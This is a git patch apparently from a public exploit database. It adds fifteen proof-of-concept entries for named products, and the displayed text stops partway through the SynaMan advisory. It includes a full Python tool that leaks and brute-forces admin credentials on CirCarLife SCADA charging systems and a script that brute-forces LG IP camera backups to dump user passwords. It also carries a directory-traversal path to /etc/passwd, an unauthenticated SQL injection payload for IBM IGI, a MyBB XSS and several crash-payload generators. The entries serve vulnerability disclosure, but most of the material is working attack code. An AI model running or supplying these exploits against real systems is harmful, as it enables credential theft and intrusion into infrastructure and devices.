From b42759b8b8dc1953edb3d7df4e0e815239b876d1 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 13 Sep 2018 05:01:52 +0000 Subject: [PATCH] DB: 2018-09-13 15 changes to exploits/shellcodes jiNa OCR Image to Text 1.0 - Denial of Service (PoC) PixGPS 1.1.8 - Denial of Service (PoC) RoboImport 1.2.0.72 - Denial of Service (PoC) PicaJet FX 2.6.5 - Denial of Service (PoC) iCash 7.6.5 - Denial of Service (PoC) PDF Explorer 1.5.66.2 - Denial of Service (PoC) Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) Apple macOS 10.13.4 - Denial of Service (PoC) CirCarLife SCADA 4.3.0 - Credential Disclosure Rubedo CMS 3.4.0 - Directory Traversal SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS) SynaMan 4.0 build 1488 - SMTP Credential Disclosure IBM Identity Governance and Intelligence 5.2.3.2 / 5.2.4 - SQL Injection MyBB 1.8.17 - Cross-Site Scripting LG Smart IP Camera 1508190 - Backup File Download --- exploits/hardware/webapps/45384.py | 371 +++++++++++++++++++++++++++++ exploits/hardware/webapps/45394.py | 113 +++++++++ exploits/linux/webapps/45385.txt | 13 + exploits/macos/dos/45391.py | 26 ++ exploits/php/webapps/45392.txt | 43 ++++ exploits/php/webapps/45393.txt | 21 ++ exploits/windows/dos/45388.py | 25 ++ exploits/windows/dos/45389.py | 25 ++ exploits/windows/dos/45390.py | 25 ++ exploits/windows/webapps/45386.txt | 39 +++ exploits/windows/webapps/45387.txt | 45 ++++ exploits/windows_x86/dos/45380.py | 25 ++ exploits/windows_x86/dos/45381.py | 25 ++ exploits/windows_x86/dos/45382.py | 25 ++ exploits/windows_x86/dos/45383.py | 25 ++ files_exploits.csv | 15 ++ 16 files changed, 861 insertions(+) create mode 100755 exploits/hardware/webapps/45384.py create mode 100755 exploits/hardware/webapps/45394.py create mode 100644 exploits/linux/webapps/45385.txt create mode 100755 exploits/macos/dos/45391.py create mode 100644 exploits/php/webapps/45392.txt create mode 100644 exploits/php/webapps/45393.txt create mode 100755 exploits/windows/dos/45388.py create mode 100755 exploits/windows/dos/45389.py create mode 100755 exploits/windows/dos/45390.py create mode 100644 exploits/windows/webapps/45386.txt create mode 100644 exploits/windows/webapps/45387.txt create mode 100755 exploits/windows_x86/dos/45380.py create mode 100755 exploits/windows_x86/dos/45381.py create mode 100755 exploits/windows_x86/dos/45382.py create mode 100755 exploits/windows_x86/dos/45383.py diff --git a/exploits/hardware/webapps/45384.py b/exploits/hardware/webapps/45384.py new file mode 100755 index 000000000..f6f1b203a --- /dev/null +++ b/exploits/hardware/webapps/45384.py @@ -0,0 +1,371 @@ +# Exploit Title: CirCarLife SCADA 4.3.0 - Credential Disclosure +# Date: 2018-09-10 +# Exploit Author: David Castro +# Vendor Homepage: https://circontrol.com/ +# Shodan Dork: Server: CirCarLife Server: PsiOcppApp +# Version: CirCarLife Scada all versions under 4.3.0 OCPP implementation all versions under 1.5.0 +# CVE : CVE-2018-12634 + +''' +Description: Mutiple information disclosure issues, including admin credentials disclosure +''' + +import requests +from requests.auth import HTTPDigestAuth +from termcolor import colored +from bs4 import BeautifulSoup +import xml.etree.ElementTree as ET +import re +import json +import base64 + +cabecera = ''' + _.-="_- _ + _.-=" _- | ||"""""""---._______ __.. + ___.===""""-.______-,,,,,,,,,,,,`-''----" """"" """"" __' + __.--"" __ ,' CIR-PWN-LIFE o \ __ [__| + __-""=======.--"" ""--.=================================.--"" ""--.=======: +] [w] : / \ : |========================| : / \ : [w] : +V___________:| SadFud75 |: |========================| :| |: _-" + V__________: \ / :_|=======================/_____: \ / :__-" + -----------' "-____-" `-------------------------------' "-____-" + +''' + +print colored(cabecera, 'white') +print colored('[*] POC for automated exploitation for CirControl SCADA systems (circarlife and OCPP (Open Charge Point Protocol))', 'blue') +print colored('[?] Vendor site: https://circontrol.com/', 'yellow') +print colored('[*] CVEs associated: ', 'blue') +print colored('CVE-2018-12634, CVE-2018-16668, CVE-2018-16669, CVE-2018-16670, CVE-2018-16671, CVE-2018-16672', 'yellow') +print colored('[*] CirCarLife Scada versions affected: ', 'blue') +print colored('[+] All versions are vulnerable. No patch available, last version 4.3.0 (09/09/2018)', 'green') +print colored('[*] PsiOcppApp (PowerStudio integration Open Charge Point Protocol Application) versions affected: ', 'blue') +print colored('[+] All versions are vulnerable. No patch available, last version 1.5.0 (09/09/2018)', 'green') +print colored('[*] Shodan dorks: ', 'blue') +print colored('[+] Server: CirCarLife', 'green') +print colored('[+] Server: PsiOcppApp', 'green') +print colored('[?] More vulnerability POCs at https://github.com/SadFud/Exploits', 'yellow') + +plcs = [] +logutil = ['GPRS modem details'] +autenticado = False + +arr_versionessoft = [] +arr_ldevstat = [] +str_repository = '' +str_lversioneshard = '' +arr_logdetails = [] +str_lsetup = '' +str_lconfig = '' + +def lversionessoft(): + print colored('[*] Getting software versions via CVE-2018-16671', 'blue') + leakv = requests.get(target1 + '/html/device-id') + versiones = leakv.text.encode("utf8").split('\n') + print colored('[+] Software versions collected succesfully', 'green') + return versiones + +def ldevstat(): + print colored('[*] Getting plc status via CVE-2018-16670', 'blue') + leakstats = requests.get(target1 + '/services/user/values.xml?var=STATUS') + statsraw = leakstats.text + tree = ET.fromstring(statsraw) + for i in range(0,len(tree.findall(".//variable"))): + for j in range(0,2): + plcs.append(tree[i][j].text) + print colored('[+] information leaked from ' + str(len(plcs)/2) + ' plcs', 'green') + return plcs + +def plcstatus(code): + code = int(code) + if code == 1: + print colored('[+] OK', 'green') + elif code == 2: + if code == 0x10: + if code == 0x20: + print colored('[-] Error: Time out.', 'red') + elif code == 0x40: + print colored('[-] Error: Bad device.', 'red') + elif code == 0x80: + print colored('[-] Error: Bad phase.', 'red') + elif code == 0x100: + print colored('[-] Error: Bad version.', 'red') + else: + print colored('[-] Error: Unknown error.', 'red') + elif code == 4: + print colored('[-] Error: not initialized.', 'red') + else: + print colored('[?] Unknown code.', 'yellow') + +def repository(): + print colored('[*] Getting installation paths via CVE-2018-16668', 'blue') + path = requests.get(target1 + '/html/repository') + rutas = path.text.encode("utf8").split('\n') + platformpath = rutas[1].split(' ') + platformpath = platformpath[0] + appsrc = rutas[3] + appsrc = rutas[3].split(' ') + appsrc = appsrc[0] + raiz = str(appsrc).find('/circarlife/') + appsrc = appsrc[0:raiz+len('/circarlife/')] + print colored('[+] Platform installation path retrieved succesfully', 'green') + return 'Platform installation path: ' + platformpath + '\n[+] Applicaction installation path: ' + appsrc + +def lversioneshard(): + print colored('[*] Getting powerstudio driver versions via CVE-2018-12634', 'blue') + basura = ['/li', '<', 'body', 'html', '>', '/ul', '/'] + hardleak = requests.get(target1 + '/services/system/info.html') + hardleak = hardleak.text.encode("utf8").replace('
', '\n') + hardleak = hardleak.replace('
  • ', '\n') + for caca in basura: + hardleak = hardleak.replace(caca, '') + print colored('[+] Powerstudio driver versions leaked succesfully', 'green') + return hardleak + +def logdetails(): + print colored('[*] Leaking sensitive information via CVE-2018-12634', 'blue') + log = requests.get(target1 + '/html/log') + log = log.text.encode("utf8") + print colored('[*] Searching for modem id', 'blue') + posmid = log.rfind('/modem-start: modem id: ') + logarr = log.split('\n') + if posmid != -1: + logutil.append('Modem model:') + print colored('[*] Modem id located', 'blue') + for linea in logarr: + if '/modem-start: modem id: ' in linea: + print colored('[+] Modem id leaked', 'green') + linea = linea.split(' ') + logutil.append(linea[9]) + else: + print colored('[-] Modem id not found', 'red') + print colored('[*] Searching for GPRS modem credentials', 'blue') + poslogin = log.rfind('Greetings!!') + if poslogin != -1: + print colored('[*] Credentials found', 'blue') + logutil.append('Modem credentials') + print colored('[+] GPRS modem credentials retrieved', 'green') + for linea in logarr: + if 'password=\"' in linea: + linea = linea.split(' ') + logutil.append(linea[11]) + logutil.append(linea[12]) + else: + print colored('[-] GPRS modem credentials not found with CVE-2018-12634', 'red') + return logutil + +def lsetup(user, pwd): + print colored('[*] Exploiting CVE-2018-16672 to leak information', 'blue') + r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user, pwd)) + if r1.text.encode("utf8").find('not granted') != -1: + print colored('[-] Error, login failed', 'red') + else: + respuesta = r1.text.encode("utf8") + print colored('[+] Setup information leaked') + return respuesta + +def lbrute(): + global luser80 + global lpasswd80 + global luser8080 + global lpasswd8080 + dicc = raw_input('Enter dictionary file with extension[format[user:password]]: ') + listado = open(dicc, "r") + data = listado.readlines() + print colored('[*] Starting bruteforce...', 'blue') + for linea in data: + linea = linea.split(':') + user = linea[0] + pwd = linea[1] + r1 = requests.get(target1 + '/services/system/setup.json', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + if r1.text.encode("utf8").find('not granted') != -1: + print colored('[-] Error, login failed on port 80 with ' + user + ':' + pwd, 'red') + else: + print colored('[+] Valid credentials found on port 80: ' + user + ':' + pwd, 'green') + luser80 = user + lpasswd80 = pwd + if r2.text.encode("utf8").find('Acess not granted') != -1: + print colored('[-] Error, login failed on port 8080 with ' + user + ':' + pwd, 'red') + else: + print colored('[+] Valid credentials found on port 8080: ' + user + ':' + pwd, 'green') + luser8080 = user + lpasswd8080 = pwd + listado.close() + +def lconfig(user, pwd): + print colored('[*] Leaking config file via CVE-2018-16669', 'blue') + r2 = requests.get(target2 + '/services/config/config.xml', auth=HTTPDigestAuth(user.strip(), pwd.strip())) + if r2.text.encode("utf8").find('Acess not granted') != -1: + print colored('[-] Error. Login failed', 'red') + else: + config = r2.text.encode('utf8') + print colored('[+] Config file leaked succesfully', 'green') + return config + +def salida(versiones, plcs, ruta, hard, log, setup, config): + print colored('[*] Parsing information and generating output.', 'blue') + print colored('[*] Parsing software information', 'blue') + print colored('[+] Device name: ', 'green') + versiones[0] + print colored('[+] Software_name: ', 'green') + versiones[1] + print colored('[+] Software_version: ', 'green') + versiones[2] + print colored('[+] System time: ', 'green') + versiones[3] + print colored('[+] ', 'green') + ruta + print colored('[*] Parsing powerstudio driver versions', 'blue') + hard = hard.replace('ul', '') + print colored(hard.strip(), 'green') + print colored('[*] Parsing PLCs values', 'blue') + for i in range(0,len(plcs)): + if ((i % 2) != 0): + codigo = plcs[i].split('.') + plcstatus(codigo[0]) + else: + nombre = plcs[i].replace('.STATUS', '') + print colored('[+] PLC name: ' + nombre, 'green') + print colored('[*] Parsing leaked data from logs using CVE-2018-12634', 'blue') + if len(log) > 3: + print colored('[*] ' + log[0], 'blue') + for i in range(2,len(log)): + if log[i] != 'Modem credentials': + print colored('[+] GPRS router model found: ', 'green') + log[i] + break + for i in range(0,len(log)): + if log[i] == 'Modem credentials': + creds = i + break + + for i in range(creds + 1, len(log)): + if (log[i].rfind('user=')) != -1: + usuario = log[i].split('=') + user = usuario[1] + user = user.replace('\"', '') + if (log[i].rfind('password=')) != -1: + cont = log[i].split('=') + contrase = cont[1] + contrase = contrase.replace('\"', '') + contrase = contrase.replace(']', '') + break + print colored('[+] Username and password for GPRS modem found: ', 'green') + user + ':' + contrase + else: + colored('[?] No data was extracted from logs using CVE-2018-12634', 'yellow') + print colored('[*] Parsing setup file', 'blue') + if (len(str(setup)) > 5): + datos = json.loads(setup) + print colored('[*] Processing device configuration data: ', 'blue') + print colored('[+] MAC Address: ', 'green') + datos["device"]["mac"] + print colored('[+] IMEI: ', 'green') + datos["device"]["imei"] + print colored('[+] ICCID: ', 'green') + datos["device"]["iccid"] + print colored('[+] IMSI: ', 'green') + datos["device"]["imsi"] + print colored('[*] Processing network configuration data: ', 'blue') + print colored('[+] Hostname: ', 'green') + datos["network"]["hostname"] + print colored('[+] ClientId: ', 'green') + datos["network"]["clientid"] + print colored('[+] IP address: ', 'green') + datos["network"]["ip"] + print colored('[+] Netmask: ', 'green') + datos["network"]["netmask"] + print colored('[+] Gateway: ', 'green') + datos["network"]["gateway"] + print colored('[+] Name server 0: ', 'green') + datos["network"]["nameserver0"] + print colored('[+] Name server 1: ', 'green') + datos["network"]["nameserver1"] + print colored('[*] Processing locale options configuration data', 'blue') + print colored('[+] Language: ', 'green') + datos["locale"]["language"] + print colored('[+] Currency: ', 'green') + datos["locale"]["currency"] + print colored('[*] Processing public address configuration data', 'blue') + print colored('[+] Host type: ', 'green') + datos["paddress"]["hosttype"] + print colored('[+] Host: ', 'green') + datos["paddress"]["host"] + print colored('[*] Processing time configuration data', 'blue') + print colored('[+] NTP Server 0: ', 'green') + datos["time"]["ntpserver0"] + print colored('[+] NTP server 1: ', 'green') + datos["time"]["ntpserver1"] + print colored('[+] Timezone: ', 'green') + datos["time"]["timezone"] + print colored('[*] Processing GPRS modem configuration data', 'blue') + print colored('[+] Acess point name: ', 'green') + datos["modem"]["apn"] + print colored('[+] Username: ', 'green') + datos["modem"]["usr"] + print colored('[+] Password: ', 'green') + datos["modem"]["pwd"] + print colored('[+] Reset: ', 'green') + str(datos["modem"]["reset"]) + print colored('[+] Ping Ip: ', 'green') + str(datos["modem"]["pingip"]) + print colored('[+] Ping period: ', 'green') + str(datos["modem"]["pingperiod"]) + print colored('[+] Ping auto reset: ', 'green') + str(datos["modem"]["pingautoreset"]) + print colored('[*] Processing DDNS configuration data', 'blue') + print colored('[+] DDNS server: ', 'green') + datos["ddns"]["server"] + print colored('[+] DDNS host: ', 'green') + datos["ddns"]["host"] + print colored('[+] DDNS Username: ', 'green') + datos["ddns"]["usr"] + print colored('[+] DDNS password: ', 'green') + datos["ddns"]["pwd"] + print colored('[*] Processing security configuration data', 'blue') + print colored('[+] Username: ', 'green') + datos["security"]["user"] + print colored('[+] Password: ', 'green') + str(datos["security"]["passwd"]) + print colored('[*] Processing services configuration data', 'blue') + print colored('[+] iManager', 'green') + str(datos["services"]["imanager"]) + print colored('[+] Active-Integration: ', 'green') + str(datos["services"]["activeIntegration"]) + print colored('[+] Web Editor: ', 'green') + str(datos["services"]["webeditor"]) + print colored('[+] SCADA Applet: ', 'green') + str(datos["services"]["appletscada"]) + print colored('[+] Html5: ', 'green') + str(datos["services"]["html5"]) + print colored('[*] Parsing Open Charge Point Protocol configuration file', 'blue') + else: + print colored('[-] Unable to retrieve the setup config file', 'red') + if (len(str(config)) > 10): + tree = ET.fromstring(config) + print colored('[*] Processing management system CS settings', 'blue') + print colored('[+] End point: ', 'green') + str(tree.find('.//csEndPoint').text) + print colored('[+] Username: ', 'green') + str(tree.find('.//csUser').text) + print colored('[+] Password: ', 'green') + str(tree.find('.//csPassword').text) + print colored('[+] Litle endian: ', 'green') + str(tree.find('.//isLitleEndian').text) + print colored('[*] Processing Charge Box settings file', 'blue') + print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text) + print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text) + print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text) + print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text) + print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text) + print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text) + print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text) + print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text) + print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text) + print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text) + print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text) + print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text) + print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text) + print colored('[+] Charge box use aprtial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text) + #print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text) + print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text) + print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text) + print colored('[+] Charge box hearth-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text) + print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text) + print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text) + #print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text) + #print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text) + #print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text) + print colored('[*] Processing Powerstudio engine settings file' , 'blue') + print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text) + print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text) + print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text) + print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text)) + print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text) + print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text)) + print colored('[*] Processing powerstudio application parameters', 'blue') + print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text) + print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text) + print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text)) + print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text) + else: + print colored('[-] Unable to retrieve the OCPP config file', 'red') + +#entrypoint +url = raw_input('Insert target ip: ') +target1 = 'http://' + url +target2 = 'http://' + url + ':8080' +luser80 = 'admin' +lpasswd80 = '1234' +luser8080 = 'admin' +lpasswd8080 = '1234' +luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)') +if (luser80 == 'b'): + lbrute() +else: + lpasswd80 = raw_input('Insert password for login at circarlife server: ') + luser8080 = raw_input('Insert username for login at OCPP server: ') + lpasswd8080 = raw_input('Insert password for login at OCPP server: ') + +versiones = lversionessoft() +plcs = ldevstat() +ruta = repository() +hard = lversioneshard() +log = logdetails() +setup = lsetup(luser80.strip(), lpasswd80.strip()) +config = lconfig(luser8080.strip(), lpasswd8080.strip()) +salida(versiones, plcs, ruta, hard, log, setup, config) \ No newline at end of file diff --git a/exploits/hardware/webapps/45394.py b/exploits/hardware/webapps/45394.py new file mode 100755 index 000000000..051474b53 --- /dev/null +++ b/exploits/hardware/webapps/45394.py @@ -0,0 +1,113 @@ +# Exploit Title: LG Smart IP Camera 1508190 - Backup File Download +# Date: 2018-09-11 +# Exploit Author: Ege Balci +# Vendor Homepage: https://www.lg.com +# Software version: 1310250 <= 1508190 +# Model: LNB*/LND*/LNU*/LNV* +# CVE: CVE-2018-16946 + +# Description: smart network camera devices have broken access control. Attackers are able to +# download /updownload/t.report (aka Log & Report) files and download backup files (via download.php) +# without authenticating. These backup files contain user credentials and configuration information for +# the camera device. An attacker is able to discover the backup filename via reading the system logs or +# report data, or just by brute-forcing the backup filename pattern. It may be possible to authenticate +# to the admin account with the admin password. + +# lg_smart_ip.py + +#!/usr/bin/python3 + +import os +import sys +import sqlite3 +import tarfile +import requests +import datetime +import threading + +if len(sys.argv) < 2: + print("Usage:\n\t"+sys.argv[0]+" ") + exit(0) + +print("#==========================================================================#") +print("# Exploit Title: LG Smart IP Device Backup Download") +print("# Date: 09-11-2018") +print("# Exploit Author: Ege Balcı") +print("# Vendor Homepage: https://www.lg.com") +print("# Model: LNB*/LND*/LNU*/LNV*") +print("# CVE: CVE-2018-16946") +print("#==========================================================================#\n\n") + +model_version_list = ["2219.0.0.1505220","2745.0.0.1508190","1954.0.0.1410150", "1030.0.0.1310250"] + +# First try the default login creds... +headers = {'Authorization': 'Basic YWRtaW46YWRtaW4='} +default = requests.get(sys.argv[1]+"/httpapi?GetDeviceInformation", headers=headers) +if "Model:" in default.text: + print("[+] Default password works (admin:admin)") + # exit(0) + + +def brute(model_version): + date = datetime.datetime.now() + u = (['\\','|','/','-']) + + for i in range(0,3650): # No need to go back futher these cameras didn't existed 10 years ago + sys.stdout.flush() + sys.stdout.write("\r[*] Bruteforing backup date...{0}".format(u[i%4])) + + log_date = date.strftime("%y") + log_date += date.strftime("%m") + log_date += date.strftime("%d") + + url = "/download.php?file=" + backup_name = "backup_" + backup_name += log_date + backup_name += "_"+model_version+".config" + + + ContentLength = requests.head(sys.argv[1]+url+backup_name,stream=True).headers["Content-Length"] + if ContentLength != "": + backup = requests.get(sys.argv[1]+url+backup_name) + print("\n[+] Backup file found !") + print("[+] "+backup_name+" -> "+str(len(backup.content))+"\n") + backup_file = open(backup_name+".tar.gz","wb") + backup_file.write(backup.content) + backup_file.close() + tar = tarfile.open(str(backup_name+".tar.gz"),mode="r:gz") + for member in tar.getnames(): + # Print contents of every file + print("[>] "+member) + mem = open(member,"wb") + mem.write(tar.extractfile(member).read()) + + + conn = sqlite3.connect('mipsca.db') + c = conn.cursor() + users = c.execute("SELECT * FROM User") + print("#=============== SUCCESS ===============#") + for u in users: + print("\n[#] Username: "+u[0]) + print("[#] Password: "+u[1]) + os.system("rm mipsca.db ConfigInfo.txt "+ backup_name+".tar.gz") + break + date = (date-datetime.timedelta(days=1)) + + + +report = requests.get(sys.argv[1]+"/updownload/t.report",verify=False) +if report.status_code != 200: + print("[-] Target device don't have report data :(") + jobs = [] + for mv in model_version_list: + t = threading.Thread(target=brute(mv)) + jobs.append(t) + + for j in jobs: + j.start() +else: + model_id = (((report.text.split("= "))[1]).split("\n"))[0] + print("[+] Model ID: "+model_id) + version = (((report.text.split("= "))[2]).split("\n"))[0] + print("[+] Version: "+version) + brute(model_id+"."+version) \ No newline at end of file diff --git a/exploits/linux/webapps/45385.txt b/exploits/linux/webapps/45385.txt new file mode 100644 index 000000000..afa96b8ea --- /dev/null +++ b/exploits/linux/webapps/45385.txt @@ -0,0 +1,13 @@ +# Exploit Title: Rubedo CMS 3.4.0 - Directory Traversal +# Google Dork: intext:rubedo.current.page.description +# Date: 2018-09-11 +# Exploit Author: Marouene Boubakri +# Vendor Homepage: https://www.rubedo-project.org +# Version: through 3.4.0 +# Tested on: Linux +# CVE : CVE-2018-16836 + +# PoC: +# Read /etc/passwd file from remote server + +/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd' \ No newline at end of file diff --git a/exploits/macos/dos/45391.py b/exploits/macos/dos/45391.py new file mode 100755 index 000000000..6f5225094 --- /dev/null +++ b/exploits/macos/dos/45391.py @@ -0,0 +1,26 @@ +# Exploit Title: Apple MacOS 10.13.4 - Denial of Service (PoC) +# Date: 2019-09-10 +# Exploit Author: Sriram (@Sri_Hxor) +# Vendor Homepage: https://support.apple.com/en-in/HT208848 +# Tested on: macOS High Sierra 10.13.4, iOS 11.3, tvOS 11.3, watchOS 4.3.0 +# CVE : CVE-2018-4240 (2018) +# POC : https://medium.com/@thesriram/cold-war-between-single-message-vs-mbbs-d5e004d64eaf + +# Crashing Phone via RLM character. +# Steps to Reproduce, + +# Run the below python script as "python apple.py", it will create a file called "dos_apple.txt" +# Copy the text from the generated apple.txt +# Paste it in WhatsApp and send it, victim gotta click and it will start crashing + +end = "‮ereh-hcuot-t'nod" +dos = "‎‏" +payload = dos*1000 + end +try: + f=open("dos_apple.txt","w") + print "[+] Creating %s DOS payload for apple..." % ((len(payload)-len(end))/len(dos)) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "Can't create a file, check DIR permissions?" \ No newline at end of file diff --git a/exploits/php/webapps/45392.txt b/exploits/php/webapps/45392.txt new file mode 100644 index 000000000..77a30ada1 --- /dev/null +++ b/exploits/php/webapps/45392.txt @@ -0,0 +1,43 @@ +# Exploit Title: [Unauthenticated Remote SQLi] +# Date: [11/09/2018] +# Exploit Author: [Mohamed Sayed - From SecureMisr Company] +# Vendor Homepage: [https://www-01.ibm.com/support/docview.wss?uid=ibm10728883] +# Version: [IGI 5.2.3.2] (REQUIRED) +# Tested on: [Windows 10] +# CVE : [CVE-2018-1756] + +Hello , +IBM IGI version 5.2.3.2 is suffering from unauthenticated remote SQLi +The vulnerability enable *remote unauthenticated* attacker to take over the +server database and affect the confidentiality , integrity and availability +of the system , + +The vulnerability is in the survey end point API +/survey/api/config?userId=XXX + +The userId parameter value is injected directly to a sql query without +sensitization nor validation and by exploiting it the attacker will be able +to gain access on the server database + +SAMPLE of Vulnerable HTTP Request + +GET /survey/api/config?userId=VUL HTTP/1.1 +Host: HOST_IP +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/66.0.3359.139 Safari/537.36 +Accept: */* +Referer: https://HOST_IP +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +Payload sample : +userId=1 'AND 1=1 AND '2'='2 + + +Mohamed Sayed +Sr.Information Security analyst + +*Please make sure to encrypt any sensitive information or attachments , you +can download my Public PGP key from* here + \ No newline at end of file diff --git a/exploits/php/webapps/45393.txt b/exploits/php/webapps/45393.txt new file mode 100644 index 000000000..a8e4c7324 --- /dev/null +++ b/exploits/php/webapps/45393.txt @@ -0,0 +1,21 @@ +# Exploit Title: MyBB 1.8.17 - Cross-Site Scripting +# Date: 2018-08-11 +# Author: 0xB9 +# Twitter: @0xB9Sec +# Contact: 0xB9[at]pm.me +# Software Link: https://mybb.com/download/ +# Version: 1.8.17 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2018-15596 + +# 1. Description: +# On the forum RSS Syndication page you can generate a URL for example... +# http://localhost/syndication.php?fid=&type=atom1.0&limit=15, the thread titles on +# those generated links aren't sanitized. + +# 2. Proof of Concept: + +- Make or find a thread of yours on the RSS feed +- Use this payload as the thread title Cool Thread Title +- View RSS feed with your thread again but with the generated URL and click on your thread +- When the thread is clicked you will be redirected to google.com \ No newline at end of file diff --git a/exploits/windows/dos/45388.py b/exploits/windows/dos/45388.py new file mode 100755 index 000000000..1df370d0f --- /dev/null +++ b/exploits/windows/dos/45388.py @@ -0,0 +1,25 @@ +# Exploit Title: iCash 7.6.5 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-12 +# Software Link: https://www.maxprog.com/site/misc/downloads_us.php +# Tested Version: 7.6.5 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. When inside the program click "File" > "Connect to Server..." +# Now paste the contents of "exploit.txt" into the fields:"Host" +# Click the "Connect" button and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 7000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/45389.py b/exploits/windows/dos/45389.py new file mode 100755 index 000000000..822174d9e --- /dev/null +++ b/exploits/windows/dos/45389.py @@ -0,0 +1,25 @@ +# Exploit Title: PDF Explorer 1.5.66.2 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-12 +# Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip +# Tested Version: 1.5.66.2 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. When inside the program click "Database" > "Custom fields settings..." +# Now paste the contents of "exploit.txt" into the fields:"Label" +# Click the "OK" button and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 7000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/dos/45390.py b/exploits/windows/dos/45390.py new file mode 100755 index 000000000..6fe6cc9c1 --- /dev/null +++ b/exploits/windows/dos/45390.py @@ -0,0 +1,25 @@ +# Exploit Title: Infiltrator Network Security Scanner 4.6 - Denial of Service (PoC) +# Author: Gionathan "John" Reale +# Discovey Date: 2018-09-12 +# Software Link: https://www.infiltration-systems.com/download.shtml +# Tested Version: 4.6 +# Tested on OS: Windows 7 32-bit +# Steps to Reproduce: Run the python exploit script, it will create a new +# file with the name "exploit.txt". Copy the content from "exploit.txt". +# Now start the program. +# Now paste the contents of "exploit.txt" into the fields:"Scan Target" +# Click the "Scan" button, wait and you will see a crash! + +#!/usr/bin/python + +buffer = "A" * 6000 + +payload = buffer +try: + f=open("exploit.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/webapps/45386.txt b/exploits/windows/webapps/45386.txt new file mode 100644 index 000000000..ab59a0bed --- /dev/null +++ b/exploits/windows/webapps/45386.txt @@ -0,0 +1,39 @@ +# Exploit Author: bzyo +# CVE: CVE-2018-10763 +# Twitter: @bzyo_ +# Exploit Title: SynaMan 4.0 - Authenticated Cross Site Scripting (XSS) +# Date: 09-12-18 +# Vulnerable Software: SynaMan 4.0 build 1488 +# Vendor Homepage: 